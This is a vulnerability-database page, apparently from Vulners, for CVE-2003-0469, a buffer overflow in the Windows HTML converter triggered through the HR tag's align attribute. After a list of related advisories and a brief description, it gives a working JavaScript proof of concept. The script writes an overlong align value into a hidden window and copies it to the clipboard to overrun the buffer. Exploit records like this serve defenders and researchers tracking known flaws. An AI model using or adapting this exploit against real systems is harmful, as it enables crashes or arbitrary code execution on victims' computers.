Microsoft Windows XP/2000/NT 4.0 - HTML Converter HR Align Buffer Overflow
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2003-0469 | 28 Jun 200304:00 | – | cve | |
| CVE-2003-0469 | 28 Jun 200304:00 | – | cvelist | |
| CVE-2003-0469 | 7 Aug 200304:00 | – | nvd | |
| Buffer Overrun In HTML Converter Could Allow Code Execution (823559) | 3 Nov 200500:00 | – | openvas | |
| Buffer Overrun In HTML Converter Could Allow Code Execution (823559) | 3 Nov 200500:00 | – | openvas | |
| CERT Advisory CA-2003-14 Buffer Overflow in Microsoft Windows HTML | 15 Jul 200300:00 | – | securityvulns | |
| MS03-023: Buffer Overrun In HTML Converter Could Allow Code Execution (823559) | 13 Oct 200300:00 | – | nessus | |
| Microsoft Windows HTML conversion library vulnerable to buffer overflow | 27 Jun 200300:00 | – | cert |
source: https://www.securityfocus.com/bid/8016/info
Microsoft Windows platforms are prone to a boundary condition error in the HTML converter. If the 'Align' attribute of the 'HR' tag is given an excessively large value, an internal buffer will be overrun. This issue can be exploited via applications which use the HTML converter (such as Internet Explorer) and will permit arbitrary code to be executed on a vulnerable system.
<script>
wnd=open("about:blank","","");
wnd.moveTo(screen.Width,screen.Height);
WndDoc=wnd.document;
WndDoc.open();
WndDoc.clear();
buffer="";
for(i=1;i<=127;i++)buffer+="X";
buffer+="DigitalScream";
WndDoc.write("<HR align='"+buffer+"'>");
WndDoc.execCommand("SelectAll");
WndDoc.execCommand("Copy");
wnd.close();
</script>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Nov 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.44629